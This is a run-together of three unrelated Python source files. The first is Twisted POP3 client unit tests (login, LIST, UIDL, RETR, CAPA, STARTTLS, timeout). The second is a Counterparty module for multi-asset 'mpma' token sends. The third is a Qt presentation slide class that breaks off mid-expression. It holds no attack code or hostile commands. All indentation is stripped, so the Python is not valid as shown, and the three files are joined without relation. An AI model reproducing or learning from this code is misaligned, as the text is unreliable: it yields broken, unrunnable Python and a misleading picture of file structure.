p.dataReceived("+OK <challenge string goes here>\r\n")
d = p.login("username", "password")
self.assertEqual(t.value(), "APOP username f34f1e464d0d7927607753129cabe39a\r\n")
p.dataReceived("+OK Welcome!\r\n")
return d.addCallback(self.assertEqual, "Welcome!")
def testInsecureLoginRaisesException(self):
p, t = setUp(greet=False)
p.dataReceived("+OK Howdy\r\n")
d = p.login("username", "password")
self.failIf(t.value())
return self.assertFailure(
d, InsecureAuthenticationDisallowed)
def testSSLTransportConsideredSecure(self):
"""
If a server doesn't offer APOP but the transport is secured using
SSL or TLS, a plaintext login should be allowed, not rejected with
an InsecureAuthenticationDisallowed exception.
"""
p, t = setUp(greet=False)
directlyProvides(t, interfaces.ISSLTransport)
p.dataReceived("+OK Howdy\r\n")
d = p.login("username", "password")
self.assertEqual(t.value(), "USER username\r\n")
t.clear()
p.dataReceived("+OK\r\n")
self.assertEqual(t.value(), "PASS password\r\n")
p.dataReceived("+OK\r\n")
return d
class ListConsumer:
def __init__(self):
self.data = {}
def consume(self, (item, value)):
self.data.setdefault(item, []).append(value)
class MessageConsumer:
def __init__(self):
self.data = []
def consume(self, line):
self.data.append(line)
class POP3ClientListTests(unittest.TestCase):
def testListSize(self):
p, t = setUp()
d = p.listSize()
self.assertEqual(t.value(), "LIST\r\n")
p.dataReceived("+OK Here it comes\r\n")
p.dataReceived("1 3\r\n2 2\r\n3 1\r\n.\r\n")
return d.addCallback(self.assertEqual, [3, 2, 1])
def testListSizeWithConsumer(self):
p, t = setUp()
c = ListConsumer()
f = c.consume
d = p.listSize(f)
self.assertEqual(t.value(), "LIST\r\n")
p.dataReceived("+OK Here it comes\r\n")
p.dataReceived("1 3\r\n2 2\r\n3 1\r\n")
self.assertEqual(c.data, {0: [3], 1: [2], 2: [1]})
p.dataReceived("5 3\r\n6 2\r\n7 1\r\n")
self.assertEqual(c.data, {0: [3], 1: [2], 2: [1], 4: [3], 5: [2], 6: [1]})
p.dataReceived(".\r\n")
return d.addCallback(self.assertIdentical, f)
def testFailedListSize(self):
p, t = setUp()
d = p.listSize()
self.assertEqual(t.value(), "LIST\r\n")
p.dataReceived("-ERR Fatal doom server exploded\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "Fatal doom server exploded"))
def testListUID(self):
p, t = setUp()
d = p.listUID()
self.assertEqual(t.value(), "UIDL\r\n")
p.dataReceived("+OK Here it comes\r\n")
p.dataReceived("1 abc\r\n2 def\r\n3 ghi\r\n.\r\n")
return d.addCallback(self.assertEqual, ["abc", "def", "ghi"])
def testListUIDWithConsumer(self):
p, t = setUp()
c = ListConsumer()
f = c.consume
d = p.listUID(f)
self.assertEqual(t.value(), "UIDL\r\n")
p.dataReceived("+OK Here it comes\r\n")
p.dataReceived("1 xyz\r\n2 abc\r\n5 mno\r\n")
self.assertEqual(c.data, {0: ["xyz"], 1: ["abc"], 4: ["mno"]})
p.dataReceived(".\r\n")
return d.addCallback(self.assertIdentical, f)
def testFailedListUID(self):
p, t = setUp()
d = p.listUID()
self.assertEqual(t.value(), "UIDL\r\n")
p.dataReceived("-ERR Fatal doom server exploded\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "Fatal doom server exploded"))
class POP3ClientMessageTests(unittest.TestCase):
def testRetrieve(self):
p, t = setUp()
d = p.retrieve(7)
self.assertEqual(t.value(), "RETR 8\r\n")
p.dataReceived("+OK Message incoming\r\n")
p.dataReceived("La la la here is message text\r\n")
p.dataReceived("..Further message text tra la la\r\n")
p.dataReceived(".\r\n")
return d.addCallback(
self.assertEqual,
["La la la here is message text",
".Further message text tra la la"])
def testRetrieveWithConsumer(self):
p, t = setUp()
c = MessageConsumer()
f = c.consume
d = p.retrieve(7, f)
self.assertEqual(t.value(), "RETR 8\r\n")
p.dataReceived("+OK Message incoming\r\n")
p.dataReceived("La la la here is message text\r\n")
p.dataReceived("..Further message text\r\n.\r\n")
return d.addCallback(self._cbTestRetrieveWithConsumer, f, c)
def _cbTestRetrieveWithConsumer(self, result, f, c):
self.assertIdentical(result, f)
self.assertEqual(c.data, ["La la la here is message text",
".Further message text"])
def testPartialRetrieve(self):
p, t = setUp()
d = p.retrieve(7, lines=2)
self.assertEqual(t.value(), "TOP 8 2\r\n")
p.dataReceived("+OK 2 lines on the way\r\n")
p.dataReceived("Line the first! Woop\r\n")
p.dataReceived("Line the last! Bye\r\n")
p.dataReceived(".\r\n")
return d.addCallback(
self.assertEqual,
["Line the first! Woop",
"Line the last! Bye"])
def testPartialRetrieveWithConsumer(self):
p, t = setUp()
c = MessageConsumer()
f = c.consume
d = p.retrieve(7, f, lines=2)
self.assertEqual(t.value(), "TOP 8 2\r\n")
p.dataReceived("+OK 2 lines on the way\r\n")
p.dataReceived("Line the first! Woop\r\n")
p.dataReceived("Line the last! Bye\r\n")
p.dataReceived(".\r\n")
return d.addCallback(self._cbTestPartialRetrieveWithConsumer, f, c)
def _cbTestPartialRetrieveWithConsumer(self, result, f, c):
self.assertIdentical(result, f)
self.assertEqual(c.data, ["Line the first! Woop",
"Line the last! Bye"])
def testFailedRetrieve(self):
p, t = setUp()
d = p.retrieve(0)
self.assertEqual(t.value(), "RETR 1\r\n")
p.dataReceived("-ERR Fatal doom server exploded\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "Fatal doom server exploded"))
def test_concurrentRetrieves(self):
"""
Issue three retrieve calls immediately without waiting for any to
succeed and make sure they all do succeed eventually.
"""
p, t = setUp()
messages = [
p.retrieve(i).addCallback(
self.assertEqual,
["First line of %d." % (i + 1,),
"Second line of %d." % (i + 1,)])
for i
in range(3)]
for i in range(1, 4):
self.assertEqual(t.value(), "RETR %d\r\n" % (i,))
t.clear()
p.dataReceived("+OK 2 lines on the way\r\n")
p.dataReceived("First line of %d.\r\n" % (i,))
p.dataReceived("Second line of %d.\r\n" % (i,))
self.assertEqual(t.value(), "")
p.dataReceived(".\r\n")
return defer.DeferredList(messages, fireOnOneErrback=True)
class POP3ClientMiscTests(unittest.TestCase):
def testCapability(self):
p, t = setUp()
d = p.capabilities(useCache=0)
self.assertEqual(t.value(), "CAPA\r\n")
p.dataReceived("+OK Capabilities on the way\r\n")
p.dataReceived("X\r\nY\r\nZ\r\nA 1 2 3\r\nB 1 2\r\nC 1\r\n.\r\n")
return d.addCallback(
self.assertEqual,
{"X": None, "Y": None, "Z": None,
"A": ["1", "2", "3"],
"B": ["1", "2"],
"C": ["1"]})
def testCapabilityError(self):
p, t = setUp()
d = p.capabilities(useCache=0)
self.assertEqual(t.value(), "CAPA\r\n")
p.dataReceived("-ERR This server is lame!\r\n")
return d.addCallback(self.assertEqual, {})
def testStat(self):
p, t = setUp()
d = p.stat()
self.assertEqual(t.value(), "STAT\r\n")
p.dataReceived("+OK 1 1212\r\n")
return d.addCallback(self.assertEqual, (1, 1212))
def testStatError(self):
p, t = setUp()
d = p.stat()
self.assertEqual(t.value(), "STAT\r\n")
p.dataReceived("-ERR This server is lame!\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "This server is lame!"))
def testNoop(self):
p, t = setUp()
d = p.noop()
self.assertEqual(t.value(), "NOOP\r\n")
p.dataReceived("+OK No-op to you too!\r\n")
return d.addCallback(self.assertEqual, "No-op to you too!")
def testNoopError(self):
p, t = setUp()
d = p.noop()
self.assertEqual(t.value(), "NOOP\r\n")
p.dataReceived("-ERR This server is lame!\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "This server is lame!"))
def testRset(self):
p, t = setUp()
d = p.reset()
self.assertEqual(t.value(), "RSET\r\n")
p.dataReceived("+OK Reset state\r\n")
return d.addCallback(self.assertEqual, "Reset state")
def testRsetError(self):
p, t = setUp()
d = p.reset()
self.assertEqual(t.value(), "RSET\r\n")
p.dataReceived("-ERR This server is lame!\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "This server is lame!"))
def testDelete(self):
p, t = setUp()
d = p.delete(3)
self.assertEqual(t.value(), "DELE 4\r\n")
p.dataReceived("+OK Hasta la vista\r\n")
return d.addCallback(self.assertEqual, "Hasta la vista")
def testDeleteError(self):
p, t = setUp()
d = p.delete(3)
self.assertEqual(t.value(), "DELE 4\r\n")
p.dataReceived("-ERR Winner is not you.\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "Winner is not you."))
class SimpleClient(POP3Client):
def __init__(self, deferred, contextFactory = None):
self.deferred = deferred
self.allowInsecureLogin = True
def serverGreeting(self, challenge):
self.deferred.callback(None)
class POP3HelperMixin:
serverCTX = None
clientCTX = None
def setUp(self):
d = defer.Deferred()
self.server = pop3testserver.POP3TestServer(contextFactory=self.serverCTX)
self.client = SimpleClient(d, contextFactory=self.clientCTX)
self.client.timeout = 30
self.connected = d
def tearDown(self):
del self.server
del self.client
del self.connected
def _cbStopClient(self, ignore):
self.client.transport.loseConnection()
def _ebGeneral(self, failure):
self.client.transport.loseConnection()
self.server.transport.loseConnection()
return failure
def loopback(self):
return loopback.loopbackTCP(self.server, self.client, noisy=False)
class TLSServerFactory(protocol.ServerFactory):
class protocol(basic.LineReceiver):
context = None
output = []
def connectionMade(self):
self.factory.input = []
self.output = self.output[:]
map(self.sendLine, self.output.pop(0))
def lineReceived(self, line):
self.factory.input.append(line)
map(self.sendLine, self.output.pop(0))
if line == 'STLS':
self.transport.startTLS(self.context)
class POP3TLSTests(unittest.TestCase):
"""
Tests for POP3Client's support for TLS connections.
"""
def test_startTLS(self):
"""
POP3Client.startTLS starts a TLS session over its existing TCP
connection.
"""
sf = TLSServerFactory()
sf.protocol.output = [
['+OK'], # Server greeting
['+OK', 'STLS', '.'], # CAPA response
['+OK'], # STLS response
['+OK', '.'], # Second CAPA response
['+OK'] # QUIT response
]
sf.protocol.context = ServerTLSContext()
port = reactor.listenTCP(0, sf, interface='127.0.0.1')
self.addCleanup(port.stopListening)
H = port.getHost().host
P = port.getHost().port
connLostDeferred = defer.Deferred()
cp = SimpleClient(defer.Deferred(), ClientTLSContext())
def connectionLost(reason):
SimpleClient.connectionLost(cp, reason)
connLostDeferred.callback(None)
cp.connectionLost = connectionLost
cf = protocol.ClientFactory()
cf.protocol = lambda: cp
conn = reactor.connectTCP(H, P, cf)
def cbConnected(ignored):
log.msg("Connected to server; starting TLS")
return cp.startTLS()
def cbStartedTLS(ignored):
log.msg("Started TLS; disconnecting")
return cp.quit()
def cbDisconnected(ign):
log.msg("Disconnected; asserting correct input received")
self.assertEqual(
sf.input,
['CAPA', 'STLS', 'CAPA', 'QUIT'])
def cleanup(result):
log.msg("Asserted correct input; disconnecting client and shutting down server")
conn.disconnect()
return connLostDeferred
cp.deferred.addCallback(cbConnected)
cp.deferred.addCallback(cbStartedTLS)
cp.deferred.addCallback(cbDisconnected)
cp.deferred.addBoth(cleanup)
return cp.deferred
class POP3TimeoutTests(POP3HelperMixin, unittest.TestCase):
def testTimeout(self):
def login():
d = self.client.login('test', 'twisted')
d.addCallback(loggedIn)
d.addErrback(timedOut)
return d
def loggedIn(result):
self.fail("Successfully logged in!? Impossible!")
def timedOut(failure):
failure.trap(error.TimeoutError)
self._cbStopClient(None)
def quit():
return self.client.quit()
self.client.timeout = 0.01
# Tell the server to not return a response to client. This
# will trigger a timeout.
pop3testserver.TIMEOUT_RESPONSE = True
methods = [login, quit]
map(self.connected.addCallback, map(strip, methods))
self.connected.addCallback(self._cbStopClient)
self.connected.addErrback(self._ebGeneral)
return self.loopback()
if ClientTLSContext is None:
for case in (POP3TLSTests,):
case.skip = "OpenSSL not present"
elif interfaces.IReactorSSL(reactor, None) is None:
for case in (POP3TLSTests,):
case.skip = "Reactor doesn't support SSL"
import twisted.mail.pop3client
class POP3ClientModuleStructureTests(unittest.TestCase):
"""
Miscellaneous tests more to do with module/package structure than
anything to do with the POP3 client.
"""
def test_all(self):
"""
twisted.mail.pop3client.__all__ should be empty because all classes
should be imported through twisted.mail.pop3.
"""
self.assertEqual(twisted.mail.pop3client.__all__, [])
def test_import(self):
"""
Every public class in twisted.mail.pop3client should be available as a
member of twisted.mail.pop3 with the exception of
twisted.mail.pop3client.POP3Client which should be available as
twisted.mail.pop3.AdvancedClient.
"""
publicClasses = [c[0] for c in inspect.getmembers(
sys.modules['twisted.mail.pop3client'],
inspect.isclass)
if not c[0][0] == '_']
for pc in publicClasses:
if not pc == 'POP3Client':
self.failUnless(hasattr(twisted.mail.pop3, pc))
else:
self.failUnless(hasattr(twisted.mail.pop3,
'AdvancedPOP3Client'))
#! /usr/bin/python3
import struct
import json
import logging
import binascii
import math
from bitcoin.core import key
from functools import reduce
from itertools import groupby
logger = logging.getLogger(__name__)
from bitstring import ReadError
from counterpartylib.lib import (config, util, exceptions, message_type, address)
from .mpma_util.internals import (_decode_mpmaSendDecode, _encode_mpmaSend)
ID = 3 # 0x03 is this specific message type
## expected functions for message version
def unpack(db, message, block_index):
try:
unpacked = _decode_mpmaSendDecode(message, block_index)
except (struct.error) as e:
raise exceptions.UnpackError('could not unpack')
except (exceptions.AssetNameError, exceptions.AssetIDError) as e:
raise exceptions.UnpackError('invalid asset in mpma send')
except (ReadError) as e:
raise exceptions.UnpackError('truncated data')
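# unpacked maps each asset id to a list of (destination, quantity[, memo])
# tuples, which is how parse() below consumes it.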
return unpacked
def validate (db, source, asset_dest_quant_list, block_index):
problems = []
if len(asset_dest_quant_list) == 0:
problems.append('send list cannot be empty')
if len(asset_dest_quant_list) == 1:
problems.append('send list cannot have only one element')
if len(asset_dest_quant_list) > 0:
# Need to manually unpack the tuple to avoid errors on scenarios where no memo is specified
grpd = groupby([(t[0], t[1]) for t in asset_dest_quant_list])
lengrps = [len(list(grpr)) for (group, grpr) in grpd]
cardinality = max(lengrps)
if cardinality > 1:
problems.append('cannot specify more than once a destination per asset')
cursor = db.cursor()
for t in asset_dest_quant_list:
# Need to manually unpack the tuple to avoid errors on scenarios where no memo is specified
asset = t[0]
destination = t[1]
quantity = t[2]
sendMemo = None
if len(t) > 3:
sendMemo = t[3]
if asset == config.BTC: problems.append('cannot send {} to {}'.format(config.BTC, destination))
if not isinstance(quantity, int):
problems.append('quantities must be an int (in satoshis) for {} to {}'.format(asset, destination))
if quantity < 0:
problems.append('negative quantity for {} to {}'.format(asset, destination))
if quantity == 0:
problems.append('zero quantity for {} to {}'.format(asset, destination))
# For SQLite3
if quantity > config.MAX_INT:
problems.append('integer overflow for {} to {}'.format(asset, destination))
# destination is always required
if not destination:
problems.append('destination is required for {}'.format(asset))
if util.enabled('options_require_memo'):
results = cursor.execute('SELECT options FROM addresses WHERE address=?', (destination,))
if results:
result = results.fetchone()
if result and result['options'] & config.ADDRESS_OPTION_REQUIRE_MEMO and (sendMemo is None):
problems.append('destination {} requires memo'.format(destination))
cursor.close()
return problems
def compose (db, source, asset_dest_quant_list, memo, memo_is_hex):
cursor = db.cursor()
out_balances = util.accumulate([(t[0], t[2]) for t in asset_dest_quant_list])
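# out_balances holds the total quantity to send per asset, so the balance
# check below is against the summed amount for each asset.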
for (asset, quantity) in out_balances:
if util.enabled('mpma_subasset_support'):
# resolve subassets
asset = util.resolve_subasset_longname(db, asset)
if not isinstance(quantity, int):
raise exceptions.ComposeError('quantities must be an int (in satoshis) for {}'.format(asset))
balances = list(cursor.execute('''SELECT * FROM balances WHERE (address = ? AND asset = ?)''', (source, asset)))
if not balances or balances[0]['quantity'] < quantity:
raise exceptions.ComposeError('insufficient funds for {}'.format(asset))
block_index = util.CURRENT_BLOCK_INDEX
cursor.close()
problems = validate(db, source, asset_dest_quant_list, block_index)
if problems: raise exceptions.ComposeError(problems)
data = message_type.pack(ID)
data += _encode_mpmaSend(db, asset_dest_quant_list, block_index, memo=memo, memo_is_hex=memo_is_hex)
return (source, [], data)
def parse (db, tx, message):
try:
unpacked = unpack(db, message, tx['block_index'])
status = 'valid'
except (struct.error) as e:
status = 'invalid: truncated message'
except (exceptions.AssetNameError, exceptions.AssetIDError) as e:
status = 'invalid: invalid asset name/id'
except (Exception) as e:
status = 'invalid: couldn\'t unpack; %s' % e
cursor = db.cursor()
plain_sends = []
all_debits = []
all_credits = []
if status == 'valid':
for asset_id in unpacked:
try:
asset = util.get_asset_name(db, asset_id, tx['block_index'])
except (exceptions.AssetNameError) as e:
status = 'invalid: asset %s invalid at block index %i' % (asset_id, tx['block_index'])
break
cursor.execute('''SELECT * FROM balances \
WHERE (address = ? AND asset = ?)''', (tx['source'], asset_id))
balances = cursor.fetchall()
if not balances:
status = 'invalid: insufficient funds for asset %s, address %s has no balance' % (asset_id, tx['source'])
break
credits = unpacked[asset_id]
total_sent = reduce(lambda p, t: p + t[1], credits, 0)
if balances[0]['quantity'] < total_sent:
status = 'invalid: insufficient funds for asset %s, needs %i' % (asset_id, total_sent)
break
if status == 'valid':
plain_sends += map(lambda t: util.py34TupleAppend(asset_id, t), credits)
all_credits += map(lambda t: {"asset": asset_id, "destination": t[0], "quantity": t[1]}, credits)
all_debits.append({"asset": asset_id, "quantity": total_sent})
if status == 'valid':
problems = validate(db, tx['source'], plain_sends, tx['block_index'])
if problems: status = 'invalid:' + '; '.join(problems)
if status == 'valid':
for op in all_credits:
util.credit(db, op['destination'], op['asset'], op['quantity'], action='mpma send', event=tx['tx_hash'])
for op in all_debits:
util.debit(db, tx['source'], op['asset'], op['quantity'], action='mpma send', event=tx['tx_hash'])
# Enumeration of the plain sends needs to be deterministic, so we sort them by asset and then by address
plain_sends = sorted(plain_sends, key=lambda x: ''.join([x[0], x[1]]))
for i, op in enumerate(plain_sends):
if len(op) > 3:
memo_bytes = op[3]
else:
memo_bytes = None
bindings = {
'tx_index': tx['tx_index'],
'tx_hash': tx['tx_hash'],
'block_index': tx['block_index'],
'source': tx['source'],
'asset': op[0],
'destination': op[1],
'quantity': op[2],
'status': status,
'memo': memo_bytes,
'msg_index': i
}
sql = 'insert into sends (tx_index, tx_hash, block_index, source, destination, asset, quantity, status, memo, msg_index) values(:tx_index, :tx_hash, :block_index, :source, :destination, :asset, :quantity, :status, :memo, :msg_index)'
cursor.execute(sql, bindings)
if status != 'valid':
logger.warn("Not storing [mpma] tx [%s]: %s" % (tx['tx_hash'], status))
cursor.close()
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
from time import sleep
import string
from PresentationObject import PresentationObject
from waitevent import waitevent
from qt import *
from qtcanvas import *
true = success = done = 1
false = failure = incomplete = 0
class slide( PresentationObject ):
"""
<slide> is used to show objects on one "page" of a presentation.
<p>
<b>Properties:</b>
<ul>
<li>
<i>background</i>: location of the image file on disk. It can be
relative to the location of the XML file or absolute to the
current file system, e.g., "imgName.gif", "img/imgName.gif",
"../imgName.gif", "/home/dmacd/presenter/examples/1/imgName.gif"
</li>
<li>
<i>stretchbackground</i>: "yes" to scale the background image to
fill the slide display. Otherwise, the background image will be
drawn at its actual size and tiled if it isn't big enough to fill the
display.
</li>
<li>
<i>bgcolor</i>/<i>bgcolour</i>: background colour for the slide.
If the <i>background</i> property is used, this property is
overridden.
</li>
<li>
<i>margintop</i>/<i>marginbottom</i>/<i>marginleft</i>/
<i>marginright</i>: number of pixels to separate slide content from
the edge of the display. The <i>margin</i> property can be used
as the value for all four sides.
</li>
<li>
<i>title</i>: name for this slide which will show in the
"Go to Slide" dialog and may be used by the
<a href="title.html"><title></a> tag within a slide.
</li>
<li>
<i>transition</i>: refresh type when making a transition from
another slide. Possible values are "blindleft", "blindright",
"blindtop", "blindbottom", "center"/"centre", "spiral", "dissolve"
and "immediate" (which is the default).
</li>
<li>
<i>transitiondelay</i>: number of seconds to wait between
refreshes for the transition. The value may be a decimal down
to millisecond precision, for example 0.05.
</li>
<li>
<i>displaynumber</i>: choose whether to display the slide number
at the bottom of the display. Possible values are "true"/"yes" or
"false"/"no"
</li>
<li>
<i>displaynumberof</i>: choose whether to display the number of
slides in the presentation at the bottom of the display when the
slide number is displayed. Possible values are "true"/"yes" or
"false"/"no". This option will only work if <i>displaynumber</i>
is "true"/"yes".
</li>
</ul>
"""
def __init__( self, *args ):
"""
Initialize the container, contents, and properties.
"""
apply( PresentationObject.__init__, (self,) + args )
def render( self, app, x, y ):
"""
Draw all PresentationObject instances within this slide.
"""
self.showBackground()
self.initAnimated()
self.setRenderHeight(0)
self.setFontHeight(0)
for content in self.getContents():
if isinstance(content, PresentationObject):
x, y = content.render( app, x, y )
else:
from font import font
text = font( self,
[content],
self.getProperties() )
i = self.getContents().index( content )
self.getContents()[i] = text
x, y = text.render( app, x, y )
#
# Draw any underlines for text in the slide.
#
for content in self.getContents():
if isinstance(content, PresentationObject):
content.drawUnderlines( app )
self.displaySlideNumber( app )
self.initAnimatedRefresh()
self.findAnimatedRefresh( self.getContents() )
return x, y
def displaySlideNumber( self, app ):
"""
Display this slide's number at the bottom of the display.
"""
#
# If a QCanvasText object for the slide number already exists,
# delete it from memory.
#
if self.getSlideNum() != None:
self.getSlideNum().setCanvas( QCanvas() )
self.setSlideNum( None )
#
# If chosen, display the slide number.
#
if self.getProperty("displaynumber") == "true" or \
self.getProperty("displaynumber") == "yes" or \
app.getConfig().displaySlideNumber:
num = "%d" % app.getSlideshow().getSlideNum()
#
#
#
if self.getProperty("displaynumberof") == "true" or \
self.getProperty("displaynumberof") == "yes" or \
app.getConfig().displaySlideNumberOf:
num = "%s of %d" % \
(num, app.getSlideshow().getNumSlides())
from font import font
qFont = font( self ).getFont( app.getHeight() )
qColor = QColor( self.getProperty("color") )
qCanvas = self.getCanvas()
self.setSlideNum( QCanvasText(num, qFont, qCanvas) )
self.getSlideNum().setColor( qColor )
else:
self.setSlideNum( None )
return
x = self.getCentre() - \
( self.getSlideNum().boundingRect().width() / 2 )
y = app.getHeight() - self.getProperty( "marginbottom" )
if y + self.getSlideNum().boundingRect().height() > \
app.getHeight():
y = app.getHeight() - \
self.getSlideNum().boundingRect().height() - \
4
self.getSlideNum().move( x, y )
self.getSlideNum().show()
def setSlideNum( self, num ):
"""
Set the QCanvasText instance which shows slide number.
num, QCanvasText object.
"""
self.__num = num
def getSlideNum( self ):
"""
Get QCanvasText instance which shows slide number.
Returns a QCanvasText object. None is returned if the canvas
object hasn't been cached.
"""
try:
return self.__num
except AttributeError:
return None
def displayAnimationIcon( self ):
"""
"""
#
# Cache the icon if it hasn't been loaded into memory yet.
#
if self.getAnimationIcon() == None:
self.iconImg = QImage( "images/anim.png" )
if self.iconImg.isNull():
self.iconImg.create( 32, 32, 8, 256 )
self.iconImg.fill(0)
self.iconPix = QCanvasPixmap( self.iconImg )
#
# Constructor for Qt 2.*
#
try:
self.iconArray = \
QCanvasPixmapArray( [self.iconPix],
[QPoint(0, 0)] )
#
# Constructor for Qt 3.*+
#
except TypeError:
self.iconArray = QCanvasPixmapArray()
self.iconArray.setImage( 0, self.iconPix )
sprite = QCanvasSprite( self.iconArray,
self.getCanvas() )
self.setAnimationIcon( sprite )
x = self.getCanvas().width() - \
self.getAnimationIcon().boundingRect().width() - 4
y = self.getCanvas().height() - \
self.getAnimationIcon().boundingRect().height() - 4
self.getAnimationIcon().move( x, y )
self.getAnimationIcon().show()
def setAnimationIcon( self, icon ):
"""
Set the QCanvasSprite instance which shows the animation
available icon.
icon, QCanvasSprite object.
"""
self.__icon = icon
def getAnimationIcon( self ):
"""
Get QCanvasSprite instance which shows the animation
available icon.
Returns a QCanvasSprite object. None is returned if the canvas
object hasn't been cached.
"""
try:
return self.__icon
except AttributeError:
return None
def showBackground( self ):
"""
Display the background for this canvas. If the stretch option
has been enabled, resize the background image to the size of
the canvas. Otherwise, the image will tile if it's too small
for the canvas and be cut off if it's larger.
"""
#
# Get the full path to the image filename.
#
bgPath = self.getProperty( "background" )
if bgPath == None:
return
if len(bgPath) and bgPath[0] != "/":
dirName = self.getSlideshow().getDirName()
bgPath = "%s/%s" % ( dirName, bgPath )
stretch = self.getProperty( "stretchbackground" )
stretch = string.lower( stretch )
if stretch == "yes" or stretch == "true":
slideshow = self.getSlideshow()
width = self.getCanvas().width()
height = self.getCanvas().height()
bgPixmap = slideshow.getBackground( bgPath,
width,
height,
true )
else:
bgPixmap = self.getSlideshow().getBackground( bgPath )
#
# If the background image wasn't cached in <slideshow>, try
# to create a local copy here.
#
if bgPixmap == None:
bgImage = QImage( bgPath )
if not bgImage.isNull():
if stretch == "yes" or stretch == "true":
bgImage = bgImage.smoothScale(
self.getCanvas().width(),
self.getCanvas().height() )
bgPixmap = QPixmap()
bgPixmap.convertFromImage( bgImage )
#
# If the given background image was read successfully, display
# it in the canvas.
#
if bgPixmap != None:
self.getCanvas().setBackgroundPixmap( bgPixmap )
def setCanvas( self, canvas ):
"""
        Set the QCanvas instance this slide is drawn on.
        canvas, QCanvas object.
"""
self.__canvas = canvas
def getCanvas( self ):
"""
"""
try:
return self.__canvas
except AttributeError:
return None
def hasCanvas( self ):
"""
"""
return self.getCanvas() != None
def getCentre( self ):
"""
Returns the centre horizontal pixel of the current slide.
"""
centre = ( self.getCanvas().width() - \
self.getProperty("marginright") - \
self.getProperty("marginleft") ) / 2 + \
self.getProperty( "marginleft" )
return centre
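    # A quick worked example of the arithmetic above (values are
    # hypothetical): on an 800-pixel-wide canvas with marginleft=40 and
    # marginright=40, the centre is (800 - 40 - 40) / 2 + 40 = 400.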
def getCenter( self ):
"""
Alias for getCentre()
"""
return self.getCentre()
def getWidth( self ):
"""
The drawing width of the slide, which is the width of the
QCanvas minus the left and right margins.
"""
if self.hasCanvas():
return self.getCanvas().width() - \
self.getProperty( "marginleft" ) - \
self.getProperty( "marginright" )
else:
return 0
def getHeight( self ):
"""
The drawing height of the slide, which is the height of the
QCanvas minus the top and bottom margins.
"""
if self.hasCanvas():
return self.getCanvas().height() - \
self.getProperty( "margintop" ) - \
self.getProperty( "marginbottom" )
else:
return 0
def initAnimated( self ):
"""
Initialize the list for the slide's animated objects.
"""
self.__animated = []
def getAnimated( self ):
"""
Get the list for the slide's animated objects.
"""
return self.__animated
def hasNextAnimated( self ):
"""
        Returns true if there are objects in the slide left to be
animated into view.
"""
if len(self.getAnimated()):
return true
else:
return false
def getNextAnimated( self ):
"""
Gets the next group of objects to animate into the slide.
"""
if not self.hasNextAnimated():
return []
else:
return self.getAnimated().pop(0)
def animateNext( self, app ):
"""
Animate into the slide the next group of objects.
Returns true if an object was animated or false if there are no
objects left to animate.
"""
didAnimation = false
objects = self.getNextAnimated()
while len(objects):
didAnimation = true
for obj in objects:
if self.animateAdvance(obj, app) == done:
objects.remove( obj )
#
# Hide the icon that indicates objects still available to
# animate into the slide if all objects in this slide have
# been displayed.
#
if not self.hasNextAnimated() and \
self.getAnimationIcon() != None:
self.getAnimationIcon().hide()
self.getCanvas().update()
return didAnimation
def animateAdvance( self, obj, app ):
"""
"""
animDir = obj["object"].getProperty( "animation" )
animSpeed = obj["object"].getProperty( "animationspeed" )
if animSpeed < 1:
animSpeed = 1
width = obj["object"].getWidth()
height = obj["object"].getHeight()
canvas = self.getCanvas()
if animDir == "left":
if self.objAtOrigin(obj):
x = animSpeed * -1
else:
x = obj["object"].x()
x = x + animSpeed
if x > obj["origX"]:
x = obj["origX"]
obj["object"].show( x, obj["origY"] )
canvas.update()
#
            # If this object has completed its animation, remove
# it from the animated list.
#
if x == obj["origX"]:
return done
elif animDir == "right":
if self.objAtOrigin(obj):
x = app.getWidth() - \
width + \
animSpeed
else:
x = obj["object"].x()
x = x - animSpeed
if x < obj["origX"]:
x = obj["origX"]
obj["object"].show( x, obj["origY"] )
canvas.update()
if x == obj["origX"]:
return done
elif animDir == "top":
if self.objAtOrigin(obj):
y = animSpeed * -1
else:
y = obj["object"].y()
y = y + animSpeed
if y > obj["origY"]:
y = obj["origY"]
obj["object"].show( obj["origX"], y )
canvas.update()
if y == obj["origY"]:
return done
elif animDir == "bottom":
if self.objAtOrigin(obj):
y = app.getHeight() - \
height + \
animSpeed
else:
y = obj["object"].y()
y = y - animSpeed
if y < obj["origY"]:
y = obj["origY"]
obj["object"].show( obj["origX"], y )
canvas.update()
if y == obj["origY"]:
return done
elif animDir == "topleft":
if self.objAtOrigin(obj):
if obj["object"].x() > obj["object"].y():
x = obj["object"].x() - \
obj["object"].y() - \
animSpeed
y = 0
else:
x = 0
y = obj["object"].y() - \
obj["object"].x() - \
animSpeed
else:
x = obj["object"].x()
y = obj["object"].y()
x = x + animSpeed
y = y + animSpeed
if x > obj["origX"] or y > obj["origY"]:
x = obj["origX"]
y = obj["origY"]
obj["object"].show( x, y )
canvas.update()
if x == obj["origX"] or y == obj["origY"]:
return done
elif animDir == "topright":
if self.objAtOrigin(obj):
x = obj["object"].x() + \
obj["object"].y() + \
animSpeed
y = animSpeed * -1
else:
x = obj["object"].x()
y = obj["object"].y()
x = x - animSpeed
y = y + animSpeed
if x < obj["origX"] or y > obj["origY"]:
x = obj["origX"]
y = obj["origY"]
obj["object"].show( x, y )
canvas.update()
if x == obj["origX"] and y == obj["origY"]:
return done
elif animDir == "bottomleft":
if self.objAtOrigin(obj):
bottomOfObj = obj["object"].y() + \
obj["object"].getHeight()
x = 0 - animSpeed
y = obj["object"].y() + \
obj["object"].x() + \
animSpeed
else:
x = obj["object"].x()
y = obj["object"].y()
x = x + animSpeed
y = y - animSpeed
if x > obj["origX"] or y < obj["origY"]:
x = obj["origX"]
y = obj["origY"]
obj["object"].show( x, y )
canvas.update()
if x == obj["origX"] and y == obj["origY"]:
return done
elif animDir == "bottomright":
if self.objAtOrigin(obj):
x = app.getWidth() - \
obj["object"].getWidth() + \
animSpeed
y = obj["object"].y() + \
app.getWidth() - \
